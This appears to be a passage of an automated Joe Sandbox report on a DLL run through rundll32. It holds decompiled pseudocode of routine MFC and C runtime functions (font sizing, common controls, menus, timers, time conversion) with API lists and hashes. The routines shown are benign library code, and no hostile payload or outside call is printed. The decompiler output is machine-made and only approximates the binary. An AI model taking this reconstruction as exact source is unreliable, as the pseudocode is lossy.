                                                                                                            				_t24 = 0xa;
                                                                                                            				_v8 = _t14;
                                                                                                            				_v72 = __ecx;
                                                                                                            				_t30 = "System";
                                                                                                            				_t15 = GetStockObject(0x11);
                                                                                                            				if(_t15 != 0) {
                                                                                                            					L2:
                                                                                                            					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
                                                                                                            						_t30 =  &_v40;
                                                                                                            						_t32 = GetDC(0);
                                                                                                            						if(_v68 < 0) {
                                                                                                            							_v68 =  ~_v68;
                                                                                                            						}
                                                                                                            						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
                                                                                                            						ReleaseDC(0, _t32);
                                                                                                            					}
                                                                                                            					L6:
                                                                                                            					if(_a4 == 0) {
                                                                                                            						_a4 = _t24;
                                                                                                            					}
                                                                                                            					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
                                                                                                            				}
                                                                                                            				_t15 = GetStockObject(0xd);
                                                                                                            				if(_t15 == 0) {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000011), ref: 10024994
                                                                                                            • GetStockObject.GDI32(0000000D), ref: 1002499C
                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
                                                                                                            • GetDC.USER32(00000000), ref: 100249B8
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
                                                                                                            • ReleaseDC.USER32 ref: 100249E3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                            • String ID: System
                                                                                                            • API String ID: 46613423-3470857405
                                                                                                            • Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                                                            • Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
                                                                                                            • Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                                                            • Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 40%
                                                                                                            			E1002155E(signed int _a4, signed int _a8) {
                                                                                                            				struct HINSTANCE__* _t6;
                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                            				struct HINSTANCE__* _t13;
                                                                                                            				struct HINSTANCE__* _t14;
                                                                                                            				CHAR* _t16;
                                                                                                            				signed int _t17;
                                                                                                            
                                                                                                            				_t16 = "COMCTL32.DLL";
                                                                                                            				_t14 = GetModuleHandleA(_t16);
                                                                                                            				_t6 = LoadLibraryA(_t16);
                                                                                                            				_t13 = _t6;
                                                                                                            				if(_t13 == 0) {
                                                                                                            					return _t6;
                                                                                                            				} else {
                                                                                                            					_t17 = 0;
                                                                                                            					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
                                                                                                            					if(_t7 != 0) {
                                                                                                            						_push(_a4);
                                                                                                            						if( *_t7() != 0) {
                                                                                                            							_t17 = _a4;
                                                                                                            							if(_t14 == 0) {
                                                                                                            								__imp__#17();
                                                                                                            								_t17 = _t17 | 0x00003fc0;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if((_a8 & 0x00003fc0) == _a8) {
                                                                                                            							__imp__#17();
                                                                                                            							_t17 = 0x3fc0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					FreeLibrary(_t13);
                                                                                                            					return _t17;
                                                                                                            				}
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
                                                                                                            • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
                                                                                                            • #17.COMCTL32 ref: 1002159F
                                                                                                            • #17.COMCTL32 ref: 100215BB
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 100215C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                            • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                                            • API String ID: 1437655972-4218389149
                                                                                                            • Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                                                            • Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
                                                                                                            • Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                                                            • Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 72%
                                                                                                            			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				int _v16;
                                                                                                            				signed int _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				signed int _v40;
                                                                                                            				int _v44;
                                                                                                            				char _v48;
                                                                                                            				void* __ebp;
                                                                                                            				int _t59;
                                                                                                            				int _t60;
                                                                                                            				void* _t61;
                                                                                                            				int _t63;
                                                                                                            				signed int _t67;
                                                                                                            				int _t68;
                                                                                                            				void* _t69;
                                                                                                            				int _t71;
                                                                                                            				intOrPtr _t74;
                                                                                                            				int _t75;
                                                                                                            				int _t76;
                                                                                                            				struct HMENU__* _t88;
                                                                                                            				intOrPtr _t90;
                                                                                                            
                                                                                                            				_t74 = __ecx;
                                                                                                            				_v8 = __ecx;
                                                                                                            				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
                                                                                                            				if(_a12 == 0) {
                                                                                                            					_t90 = _a4;
                                                                                                            					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                                                                                                            						L3:
                                                                                                            						E1001FFB4( &_v48);
                                                                                                            						_v36 = _t90;
                                                                                                            						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
                                                                                                            							if(GetMenu( *(_t74 + 0x1c)) == 0) {
                                                                                                            								L14:
                                                                                                            								_t59 = GetMenuItemCount( *(_t90 + 4));
                                                                                                            								_v40 = _v40 & 0x00000000;
                                                                                                            								_v16 = _t59;
                                                                                                            								if(_t59 <= 0) {
                                                                                                            									L34:
                                                                                                            									L35:
                                                                                                            									return _t59;
                                                                                                            								}
                                                                                                            								do {
                                                                                                            									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
                                                                                                            									_v44 = _t60;
                                                                                                            									if(_t60 == 0) {
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									if(_t60 != 0xffffffff) {
                                                                                                            										_v32 = _v32 & 0x00000000;
                                                                                                            										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
                                                                                                            											_t61 = 0;
                                                                                                            										} else {
                                                                                                            											_t61 = 1;
                                                                                                            										}
                                                                                                            										_push(_t61);
                                                                                                            										L27:
                                                                                                            										_push(_t74);
                                                                                                            										E1001FFDA( &_v48);
                                                                                                            										_t63 = GetMenuItemCount( *(_t90 + 4));
                                                                                                            										_t75 = _t63;
                                                                                                            										if(_t75 >= _v16) {
                                                                                                            											L32:
                                                                                                            											_v16 = _t75;
                                                                                                            											_t74 = _v8;
                                                                                                            											goto L33;
                                                                                                            										}
                                                                                                            										_v40 = _v40 + _t63 - _v16;
                                                                                                            										while(_v40 < _t75) {
                                                                                                            											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
                                                                                                            												goto L32;
                                                                                                            											}
                                                                                                            											_v40 = _v40 + 1;
                                                                                                            										}
                                                                                                            										goto L32;
                                                                                                            									}
                                                                                                            									_t67 = E1000822C(_t90, _v40);
                                                                                                            									_v32 = _t67;
                                                                                                            									if(_t67 == 0) {
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									_t68 = GetMenuItemID( *(_t67 + 4), 0);
                                                                                                            									_v44 = _t68;
                                                                                                            									if(_t68 != 0 && _t68 != 0xffffffff) {
                                                                                                            										_push(0);
                                                                                                            										goto L27;
                                                                                                            									}
                                                                                                            									L33:
                                                                                                            									_v40 = _v40 + 1;
                                                                                                            									_t59 = _v40;
                                                                                                            								} while (_t59 < _v16);
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							_t69 = E10023092(_t74);
                                                                                                            							if(_t69 == 0) {
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							_t88 = GetMenu( *(_t69 + 0x1c));
                                                                                                            							if(_t88 == 0) {
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							_t71 = GetMenuItemCount(_t88);
                                                                                                            							_t76 = 0;
                                                                                                            							_a12 = _t71;
                                                                                                            							if(_t71 <= 0) {
                                                                                                            								L13:
                                                                                                            								_t74 = _v8;
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
                                                                                                            								_t76 = _t76 + 1;
                                                                                                            								if(_t76 < _a12) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L13;
                                                                                                            							}
                                                                                                            							_push(_t88);
                                                                                                            							_v12 = E10026280();
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						_v12 = _t90;
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            					_push(0);
                                                                                                            					_push(_a8);
                                                                                                            					_push(_t90);
                                                                                                            					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
                                                                                                            					if(0 != 0) {
                                                                                                            						goto L35;
                                                                                                            					}
                                                                                                            					goto L3;
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}

























                                                                                                            0x10032193
                                                                                                            0x10032197
                                                                                                            0x1003219a
                                                                                                            0x100321ba
                                                                                                            0x100321ba
                                                                                                            0x00000000
                                                                                                            0x100321ba
                                                                                                            0x1003219c
                                                                                                            0x100321a9
                                                                                                            0x100321ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100321af
                                                                                                            0x100321b1
                                                                                                            0x100321b7
                                                                                                            0x00000000
                                                                                                            0x100321b7
                                                                                                            0x10032162
                                                                                                            0x00000000
                                                                                                            0x10032162
                                                                                                            0x10032139
                                                                                                            0x1003213a
                                                                                                            0x1003213d
                                                                                                            0x1003213e
                                                                                                            0x10032143
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032143
                                                                                                            0x10032283

                                                                                                            APIs
                                                                                                              • Part of subcall function 10029BA4: GetFocus.USER32(?,10032120,?), ref: 10029BA5
                                                                                                              • Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
                                                                                                              • Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
                                                                                                              • Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
                                                                                                              • Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
                                                                                                              • Part of subcall function 10029BA4: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 10029C0F
                                                                                                            • GetMenu.USER32(?), ref: 10032170
                                                                                                            • GetMenu.USER32(?), ref: 10032184
                                                                                                            • GetMenuItemCount.USER32 ref: 1003218D
                                                                                                            • GetSubMenu.USER32 ref: 1003219E
                                                                                                            • GetMenuItemCount.USER32 ref: 100321C0
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 100321E1
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 10032209
                                                                                                            • GetMenuItemCount.USER32 ref: 10032240
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 1003225B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 4186786570-0
                                                                                                            • Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                                                            • Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
                                                                                                            • Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                                                            • Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				struct tagPOINT _v20;
                                                                                                            				void* __ebp;
                                                                                                            				short _t42;
                                                                                                            				signed int _t49;
                                                                                                            				struct HWND__* _t60;
                                                                                                            				intOrPtr _t63;
                                                                                                            				intOrPtr _t66;
                                                                                                            				void* _t68;
                                                                                                            				void* _t71;
                                                                                                            				void* _t74;
                                                                                                            				intOrPtr _t83;
                                                                                                            				void* _t84;
                                                                                                            				intOrPtr _t85;
                                                                                                            				struct HWND__* _t87;
                                                                                                            				intOrPtr _t88;
                                                                                                            				intOrPtr* _t89;
                                                                                                            				void* _t90;
                                                                                                            
                                                                                                            				_t89 = __ecx;
                                                                                                            				_t42 = GetKeyState(1);
                                                                                                            				if(_t42 < 0) {
                                                                                                            					return _t42;
                                                                                                            				}
                                                                                                            				_t85 = E100373DB();
                                                                                                            				_v12 = _t85;
                                                                                                            				GetCursorPos( &_v20);
                                                                                                            				ScreenToClient( *(_t89 + 0x1c),  &_v20);
                                                                                                            				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
                                                                                                            				_v8 = _t49;
                                                                                                            				if(_t49 < 0) {
                                                                                                            					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
                                                                                                            				} else {
                                                                                                            					_t74 = E10023092(_t89);
                                                                                                            					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
                                                                                                            						_v8 = _v8 | 0xffffffff;
                                                                                                            					}
                                                                                                            					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                                                                                                            					if(_t66 != 0) {
                                                                                                            						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
                                                                                                            					} else {
                                                                                                            						_t88 = 0;
                                                                                                            					}
                                                                                                            					_t68 = E100220EE(_t90, GetCapture());
                                                                                                            					if(_t68 != _t89) {
                                                                                                            						if(_t68 != 0) {
                                                                                                            							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
                                                                                                            						} else {
                                                                                                            							_t83 = 0;
                                                                                                            						}
                                                                                                            						if(_t83 != _t88 && E10023092(_t68) == _t74) {
                                                                                                            							_v8 = _v8 | 0xffffffff;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(_v8 < 0) {
                                                                                                            					L25:
                                                                                                            					if( *(_v12 + 0x78) == 0xffffffff) {
                                                                                                            						KillTimer( *(_t89 + 0x1c), 0xe001);
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
                                                                                                            					goto L28;
                                                                                                            				} else {
                                                                                                            					ClientToScreen( *(_t89 + 0x1c),  &_v20);
                                                                                                            					_push(_v20.y);
                                                                                                            					_t87 = WindowFromPoint(_v20);
                                                                                                            					if(_t87 == 0) {
                                                                                                            						L23:
                                                                                                            						_t59 = _v12;
                                                                                                            						_v8 = _v8 | 0xffffffff;
                                                                                                            						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
                                                                                                            						L24:
                                                                                                            						if(_v8 >= 0) {
                                                                                                            							L28:
                                                                                                            							_t53 = 0xe000;
                                                                                                            							if(_a4 == 0xe000) {
                                                                                                            								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
                                                                                                            								if(_v8 >= 0) {
                                                                                                            									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							return _t53;
                                                                                                            						}
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            					_t60 =  *(_t89 + 0x1c);
                                                                                                            					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                                                                                                            						goto L24;
                                                                                                            					} else {
                                                                                                            						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                                                                                                            						if(_t63 != 0) {
                                                                                                            							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
                                                                                                            						}
                                                                                                            						if(_t63 == _t87) {
                                                                                                            							goto L24;
                                                                                                            						} else {
                                                                                                            							goto L23;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}






















                                                                                                            0x1002f607
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002f607
                                                                                                            0x1002f5ea

                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002F50D
                                                                                                            • GetCursorPos.USER32(?), ref: 1002F52C
                                                                                                            • ScreenToClient.USER32 ref: 1002F539
                                                                                                            • GetCapture.USER32 ref: 1002F586
                                                                                                              • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                                                            • ClientToScreen.USER32(?,?), ref: 1002F5CD
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 1002F5D9
                                                                                                            • IsChild.USER32(?,00000000), ref: 1002F5EE
                                                                                                            • KillTimer.USER32(?,0000E001), ref: 1002F62B
                                                                                                            • KillTimer.USER32(?,0000E000), ref: 1002F647
                                                                                                              • Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
                                                                                                              • Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                                                            • String ID:
                                                                                                            • API String ID: 1383385731-0
                                                                                                            • Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                                                            • Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
                                                                                                            • Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                                                            • Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 69%
                                                                                                            			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				char _v16;
                                                                                                            				signed int _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				signed int _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				char _t72;
                                                                                                            				signed int _t74;
                                                                                                            				void* _t86;
                                                                                                            				void* _t88;
                                                                                                            				void* _t90;
                                                                                                            				void* _t92;
                                                                                                            				void* _t95;
                                                                                                            				void* _t98;
                                                                                                            				void* _t101;
                                                                                                            				void* _t105;
                                                                                                            				intOrPtr _t109;
                                                                                                            				intOrPtr _t111;
                                                                                                            				void* _t123;
                                                                                                            				signed int _t124;
                                                                                                            				signed int _t125;
                                                                                                            				void* _t127;
                                                                                                            				signed int _t133;
                                                                                                            				signed int _t138;
                                                                                                            				signed int _t139;
                                                                                                            				void* _t141;
                                                                                                            				signed int _t145;
                                                                                                            				signed int _t150;
                                                                                                            				signed int _t154;
                                                                                                            				signed int _t156;
                                                                                                            				signed int _t161;
                                                                                                            				signed int _t163;
                                                                                                            				void* _t171;
                                                                                                            
                                                                                                            				_t138 = __edx;
                                                                                                            				_t141 = __eax;
                                                                                                            				_t72 =  *((intOrPtr*)(__eax + 0x14));
                                                                                                            				asm("cdq");
                                                                                                            				_t154 = __edx;
                                                                                                            				_v16 = _t72;
                                                                                                            				_v12 = __edx;
                                                                                                            				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
                                                                                                            					L30:
                                                                                                            					_t139 = _t138 | 0xffffffff;
                                                                                                            					__eflags = _t139;
                                                                                                            					return _t139;
                                                                                                            				} else {
                                                                                                            					_t156 = _v12;
                                                                                                            					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
                                                                                                            						goto L30;
                                                                                                            					} else {
                                                                                                            						_t74 =  *(_t141 + 0x10);
                                                                                                            						if(_t74 < 0 || _t74 > 0xb) {
                                                                                                            							asm("cdq");
                                                                                                            							_t124 = 0xc;
                                                                                                            							_t138 = _t74 % _t124;
                                                                                                            							_t125 = _t138;
                                                                                                            							asm("cdq");
                                                                                                            							_v16 = _v16 + _t74 / _t124;
                                                                                                            							 *(_t141 + 0x10) = _t125;
                                                                                                            							asm("adc [ebp-0x8], edx");
                                                                                                            							if(_t125 < 0) {
                                                                                                            								_v16 = _v16 + 0xffffffff;
                                                                                                            								 *(_t141 + 0x10) = _t125 + 0xc;
                                                                                                            								asm("adc dword [ebp-0x8], 0xffffffff");
                                                                                                            							}
                                                                                                            							_t161 = _v12;
                                                                                                            							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
                                                                                                            								goto L30;
                                                                                                            							} else {
                                                                                                            								_t163 = _v12;
                                                                                                            								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
                                                                                                            									goto L30;
                                                                                                            								} else {
                                                                                                            									goto L16;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							L16:
                                                                                                            							_t145 =  *(_t141 + 0x10);
                                                                                                            							asm("cdq");
                                                                                                            							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
                                                                                                            							_v20 = _t138;
                                                                                                            							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
                                                                                                            								asm("adc ecx, 0x0");
                                                                                                            								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								goto L19;
                                                                                                            							} else {
                                                                                                            								L19:
                                                                                                            								if(_t145 > 1) {
                                                                                                            									_v24 = _v24 + 1;
                                                                                                            									asm("adc dword [ebp-0x10], 0x0");
                                                                                                            								}
                                                                                                            								L21:
                                                                                                            								_t138 = _v12;
                                                                                                            								_t127 = 0;
                                                                                                            								_t147 = _v16 - 1;
                                                                                                            								asm("sbb eax, ecx");
                                                                                                            								_v28 = _v12;
                                                                                                            								asm("adc edx, ecx");
                                                                                                            								_v32 = _v16 - 1;
                                                                                                            								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc ecx, edx");
                                                                                                            								_v8 = _t138;
                                                                                                            								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
                                                                                                            								asm("sbb eax, edx");
                                                                                                            								_t90 = E10013780(_t147, _v28, 4, 0);
                                                                                                            								asm("adc eax, edx");
                                                                                                            								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
                                                                                                            								asm("adc eax, edx");
                                                                                                            								asm("adc eax, [ebp-0x10]");
                                                                                                            								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
                                                                                                            								_t123 = 0;
                                                                                                            								asm("sbb eax, ebx");
                                                                                                            								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edx, esi");
                                                                                                            								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edx, esi");
                                                                                                            								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
                                                                                                            								_t131 = _t101;
                                                                                                            								_t150 = _t138;
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edx, esi");
                                                                                                            								_t169 = _a4 - _t123;
                                                                                                            								_v16 =  *_t141 + _t101;
                                                                                                            								_v12 = _t138;
                                                                                                            								if(_a4 == _t123) {
                                                                                                            									_t105 = E10018BEF( &_v16);
                                                                                                            									L28:
                                                                                                            									if(_t105 == _t123) {
                                                                                                            										goto L30;
                                                                                                            									}
                                                                                                            									L29:
                                                                                                            									_t133 = 9;
                                                                                                            									return memcpy(_t141, _t105, _t133 << 2);
                                                                                                            								}
                                                                                                            								E100193FB(_t150, _t169);
                                                                                                            								_t109 =  *0x1004cde8; // 0x7080
                                                                                                            								asm("cdq");
                                                                                                            								_v16 = _v16 + _t109;
                                                                                                            								asm("adc [ebp-0x8], edx");
                                                                                                            								_t105 = E100134E7(_t131, _t138,  &_v16);
                                                                                                            								if(_t105 == _t123) {
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t136 =  *((intOrPtr*)(_t141 + 0x20));
                                                                                                            								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
                                                                                                            								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
                                                                                                            									_t111 =  *0x1004cdf0; // 0xfffff1f0
                                                                                                            									asm("cdq");
                                                                                                            									_v16 = _v16 + _t111;
                                                                                                            									asm("adc [ebp-0x8], edx");
                                                                                                            									_t105 = E100134E7(_t136, _t138,  &_v16);
                                                                                                            									goto L28;
                                                                                                            								} else {
                                                                                                            									goto L29;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}








































                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 10013342
                                                                                                            • __allrem.LIBCMT ref: 1001335A
                                                                                                            • __allrem.LIBCMT ref: 10013376
